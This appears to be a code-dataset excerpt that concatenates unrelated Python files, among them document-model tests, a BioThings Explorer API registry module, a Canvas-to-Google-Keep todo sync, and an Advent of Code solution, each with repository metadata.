}
assert list(user._field_attrs_.keys()) == [
"id",
"signed_up",
"username",
"email",
"location",
]
with pytest.raises(TypeError) as e:
User(fake_field=1)
assert e.value.args == (
"'fake_field' is an invalid keyword argument for <class 'tests.test_document.User'>",
)
def test_pre_save(write_client):
class AutoDatePost(DocumentSource):
author = Object(properties=User, required=True)
updated = Date(required=True)
body = Text(required=True)
comments = Nested(properties=Comment, multiple=True)
def _pre_save_op_(self):
if self.updated is None:
# TODO - handle datetime serialization
self.updated = "2021-01-01"
post = AutoDatePost(author=User(id=1, username="paul"), body="knock knock")
post._pre_save_op_()
assert post.updated == "2021-01-01"
def test_post_init(write_client):
class AutoArchivedPost(DocumentSource):
updated = Date(required=True)
archived = Boolean()
def _post_init_(self) -> None:
# automatically archive post that hasn't been updated in a while
if self.updated and self.updated < "2020":
self.archived = True
post = AutoArchivedPost(archived=False)
assert post.archived is False
post = AutoArchivedPost(updated="1920", archived=False)
assert post.archived is True
def test_nested_document_to_dict():
paul = User(id=1, username="paul")
chani = User(id=2, username="chani")
post = Post(
author=paul,
body="knock knock",
comments=[
Comment(author=chani, content="who's there?"),
Comment(author=paul, content="it's me"),
],
)
assert post._to_dict_() == {
"author": {"id": 1, "username": "paul"},
"body": "knock knock",
"comments": [
{"author": {"id": 2, "username": "chani"}, "content": "who's there?"},
{"author": {"id": 1, "username": "paul"}, "content": "it's me"},
],
}
def test_doc_deserialization():
post = Post._from_dict_(
{
"author": {"id": 1, "username": "paul"},
"body": "knock knock",
"comments": [
{"author": {"id": 2, "username": "chani"}, "content": "who's there?"},
{"author": {"id": 1, "username": "paul"}, "content": "it's me"},
],
}
)
assert isinstance(post.author, User)
assert post.author.id == 1
assert post.author.username == "paul"
assert post.body == "knock knock"
assert len(post.comments) == 2
assert post.comments[0].author.id == 2
assert post.comments[0].author.username == "chani"
assert post.comments[0].content == "who's there?"
assert post.comments[1].author.id == 1
assert post.comments[1].author.username == "paul"
assert post.comments[1].content == "it's me"
# strict fails
with pytest.raises(TypeError) as e:
Post._from_dict_(
{
"author": {"id": 1, "username": "paul"},
"body": "knock knock",
"comments": [
{
"author": {"id": 2, "username": "chani"},
"content": "who's there?",
},
{
"author": {"id": 1, "username": ["paul", "paulo"]},
"content": "it's me",
},
],
}
)
assert e.value.args == (
"Unexpected list for field comments.author.username, got ['paul', 'paulo']",
)
# not strict is ok
post = Post._from_dict_(
{
"author": {"id": 1, "username": "paul"},
"body": "knock knock",
"comments": [
{"author": {"id": 2, "username": "chani"}, "content": "who's there?"},
{
"author": {"id": 1, "username": ["paul", "paulo"]},
"content": "it's me",
},
],
},
strict=False,
)
assert post.comments[1].author.username == ["paul", "paulo"]
def test_nested_document_to_dict_empty_multiple():
# with empty 'multiple' field: -> [] instead of None
post = Post(author=User(id=1, username="paul"), body="knock knock")
assert post.comments == []
assert post._to_dict_(with_empty_keys=True) == {
"author": {
"email": None,
"id": 1,
"location": None,
"signed_up": None,
"username": "paul",
},
"body": "knock knock",
"comments": [],
"created": None,
}
def test_document_to_dict():
user = User(id=1, signed_up="2021-01-01")
assert user._to_dict_() == {"id": 1, "signed_up": "2021-01-01"}
assert user._to_dict_(with_empty_keys=True) == {
"email": None,
"id": 1,
"location": None,
"signed_up": "2021-01-01",
"username": None,
}
| 6,537 |
biothings_explorer/_deprecated_registry.py
|
luluricketts/biothings_explorer
| 21 |
2173099
|
# -*- coding: utf-8 -*-
"""
Storing metadata information and connectivity of APIs.
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from copy import deepcopy
import networkx as nx
from ._deprecated_mapping_parser import MappingParser
from .config import metadata
from .utils.simple_semmed import semmed
from .utils.cord import cord, SEMANTIC_TYPE_ID_MAPPING
from pathlib import Path
CURRENT_PATH = Path(__file__)
class Registry():
"""Convert metadata information of APIs into a networkx graph."""
def __init__(self):
"""Initialize networkx graph and load biothings apis."""
self.G = nx.MultiDiGraph()
self.registry = {}
# self.load_biothings()
self.all_edges_info = self.G.edges(data=True)
self.all_labels = {d[-1]['label'] for d in self.all_edges_info}
self.all_inputs = {d[-1]['input_type'] for d in self.all_edges_info}
self.all_outputs = {d[-1]['output_type'] for d in self.all_edges_info}
@staticmethod
def _auto_generate_cord_mapping(doc_type):
"""Auto-generate schema mapping file for all CORD APIs
:param: doc_type: the document type of the specific cord API
"""
res = {
"@context": "http://schema.org",
"@type": doc_type
}
for id_type in SEMANTIC_TYPE_ID_MAPPING[doc_type]:
res[id_type.lower()] = id_type.lower()
for pred, output_types in cord[doc_type].items():
res[pred] = []
for output_type in output_types:
tmp = {
"@type": output_type,
"$source": "CORD",
"pmd": "associated_with.pmc",
}
for input_id_type in SEMANTIC_TYPE_ID_MAPPING[doc_type]:
for output_id_type in SEMANTIC_TYPE_ID_MAPPING[output_type]:
tmp[output_id_type.lower()] = "associated_with." + output_id_type.lower()
tmp["$input"] = input_id_type.lower()
res[pred].append(tmp)
return res
@staticmethod
def _auto_generate_semmed_operation_list(doc_type):
res = []
for pred, output_types in semmed[doc_type].items():
for output_type in output_types:
_id = '-'.join([doc_type, pred, output_type])
res.append({'$ref': "#/components/x-bte-kgs-operations/" + _id})
return res
@staticmethod
def _auto_generate_semmed_operation(doc_type):
x_operation_template = {
"inputSeparator": ",",
"inputs": [
{
"id": "UMLS"
}
],
"method": "post",
"source": "SEMMED",
"outputs": [
{
"id": "UMLS"
}
],
"parameters": {
"fields": ""
},
"path": "/query",
"requestBody": {
"body": {
"q": "{inputs[0]}",
"scopes": "umls"
}
},
"supportBatch": True,
"response_mapping": {
"$ref": ""
}
}
res = {}
for pred, output_types in semmed[doc_type].items():
for output_type in output_types:
_id = '-'.join([doc_type, pred, output_type])
tmp = deepcopy(x_operation_template)
tmp['parameters']['fields'] = pred
tmp['inputs'][0]['semantic'] = doc_type
tmp['outputs'][0]['semantic'] = output_type
tmp['predicate'] = pred
tmp['response_mapping']["$ref"] = '#/components/x-bte-response-mapping/' + _id
res[_id] = [tmp]
return res
@staticmethod
def _auto_generate_semmed_mapping(doc_type):
"""Auto-generate schema mapping file for all SEMMED APIs
:param: doc_type: the document type of the specific semmed API
"""
result = {}
for pred, output_types in semmed[doc_type].items():
for output_type in output_types:
_id = '-'.join([doc_type, pred, output_type])
result[_id] = {
"umls": pred + '.umls',
"pmid": pred + '.pmid',
}
return result
def load_biothings(self):
"""Load biothings API into registry network graph."""
# load biothings schema
self.mp = MappingParser()
# loop through API metadata
for _api, _info in metadata.items():
# use the mapping parser module to load relationship of each API
# into the network
if _info.get('api_name') == 'CORD API':
mapping_file = self._auto_generate_cord_mapping(_info.get('doc_type'))
elif _info.get('api_name') == 'SEMMED API':
mapping_file = self._auto_generate_semmed_mapping(_info.get('doc_type'))
elif 'mapping_url' in _info:
self.registry[_api] = {}
mapping_file = Path.joinpath(CURRENT_PATH.parent,
'smartapi/schema', _api + '.json')
else:
continue
self.mp.load_mapping(mapping_file, api=_api)
self.registry[_api] = {
'mapping': self.mp.mapping,
'graph': self.mp.connect(),
'type': self.mp.type
}
self.G.add_edges_from(self.registry[_api]['graph'].edges(data=True))
return self.G
def filter_edges(self, input_cls=None, output_cls=None, edge_label=None):
"""
Filter edges based on input, output and label.
The relationship between bio-entities is represented as a networkx MultiDiGraph \
in BioThings explorer. This function helps you filter for the relationships of your interest based on input/output/edge info.
:param: input_cls (str|list|None) : the semantic type(s) of the input.
Optional
:param: output_cls (str|list|None) : the semantic type(s) of the output.
Optional
:param: edge_label (str|list|None) : the relationship between input and output.
"""
if edge_label:
if isinstance(edge_label, str):
edge_label = [edge_label]
# if no edge label is specified, set it as all labels
else:
edge_label = self.all_labels
# if no input_cls is specified, set it as all input types
if not input_cls:
input_cls = self.all_inputs
# if input_cls is str, convert it to list of one element
elif isinstance(input_cls, str):
input_cls = [input_cls]
# if no output_cls is specified, set it as all output types
if not output_cls:
output_cls = self.all_outputs
elif isinstance(output_cls, str):
output_cls = [output_cls]
return [d for u,v,d in self.all_edges_info if d['input_type'] in input_cls and d['output_type'] in output_cls and d['label'] in edge_label]
| 7,189 |
canvas_todo/canvas_todo.py
|
ryansingman/canvas-todo
| 0 |
2171204
|
import threading
import collections
from typing import Any, Dict, List
from time import sleep
import keyring
from canvasapi import Canvas
from canvasapi.course import Course
from colored import fore, style
from .todo import GKeep, Task, Completed, Update
from .assignments import get_assignments
from .utils import get_courses_from_ids
from .config import get_app_config, get_canvas_config, get_gkeep_config
class CanvasTodo(threading.Thread):
"""CanvasTodo main class
"""
canvas_conf: Dict[str, Any]
app_conf: Dict[str, Any]
gkeep_conf: Dict[str, Any]
canv: Canvas
todo: GKeep
courses = List[Course]
def __init__(self):
"""Initializes CanvasTodo class
"""
# init thread
super().__init__()
# get canvas conf
self.canvas_conf = get_canvas_config()
# get app conf
self.app_conf = get_app_config()
# get gkeep conf
self.gkeep_conf = get_gkeep_config()
# create canvas obj
self.canv = Canvas(
self.canvas_conf["api_url"],
keyring.get_password('canvas-token', self.canvas_conf["api_username"])
)
# create todo obj (gkeep)
self.todo = GKeep(self.gkeep_conf)
# get user
self.user = self.canv.get_current_user()
# get list of courses
self.courses = get_courses_from_ids(self.canv, self.app_conf["classes"])
def run(self):
"""Runs CanvasTodo thread
Get assignments, (maybe) prints to console, (tbd) updates todo list on google keep
"""
# inf run loop
while True:
# get updated canvas tasks
canvas_tasks = get_assignments(
self.courses, self.user, **self.app_conf["assignments_conf"]
)
# print assignments
if self.app_conf["console_print"]:
self.print_assignments(canvas_tasks)
# get todo state
todo_dict = self.todo.request_todo_state(self.app_conf["classes"])
# generate dictionary of updates to todo state with assignments
update_dict = self.gen_update_todo_dict(todo_dict, canvas_tasks)
# set todo state
self.todo.post_todo_state(update_dict, self.app_conf["classes"])
# sleep for <update_rate> minutes
sleep(self.app_conf["update_rate"])
@staticmethod
def print_assignments(asssignments: Dict[Course, List[Task]]):
"""Pretty prints assignments for each course
Parameters
----------
asssignments : Dict[Course, List[Task]]
assignments to print
"""
for course, course_assignments in asssignments.items():
print(f"{fore.GREEN}{style.BOLD}{course.name}:{style.RESET}")
# print each assignment
for assmnt in course_assignments:
print(" " + str(assmnt))
@staticmethod
def gen_update_todo_dict(
todo_dict: Dict[int, List[Task]], canvas_tasks: Dict[Course, List[Task]]
) -> Dict[int, Dict[Update, List[Any]]]:
"""Generates update dictionary consisting of change to make to todo
Parameters
----------
todo_dict : Dict[int, List[Task]]
todo dictionary, contains state from todo app, keyed by course id
canvas_tasks : Dict[Course, List[Task]]
tasks dictionary from canvas, keyed by Course object
Returns
-------
Dict[int, Dict[Update, List[Any]]]
update dictionary, keyed by course ID
"""
# init update dict
update_dict = collections.defaultdict(lambda: collections.defaultdict(list))
# iterate over courses
for course, course_canv_tasks in canvas_tasks.items():
# get todo tasks for course
todo_tasks = todo_dict[course.id]
# iterate over canvas tasks
for canv_task in course_canv_tasks:
# check if task exists in todo tasks
if not canv_task in todo_tasks:
# check if same task exists, but is marked incomplete in todo
if (
(canv_task.name, canv_task.due_date) in
[(t.name, t.due_date) for t in todo_tasks]
):
# mark task as complete in todo if complete in canvas
if canv_task.completed == Completed.COMPLETE:
update_dict[course.id][Update.MARK_COMPLETE].append(canv_task)
else:
# if task does not exist at all in todo, add it
update_dict[course.id][Update.ADD].append(canv_task)
# return update dict
return update_dict
| 4,820 |
day07/main.py
|
OliElli/aoc2021
| 0 |
2173194
|
#!/usr/bin/env python3
from statistics import median, mean
# pt1
input = [int(x) for x in [l for l in open("input.txt", "r")][0].split(',')]
print(round(sum([abs(x - median(input)) for x in input])))
# pt2
print(round(sum([f * (f + 1) / 2 for f in [abs(x - round(mean(input) - 1)) for x in input]])))
| 304 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.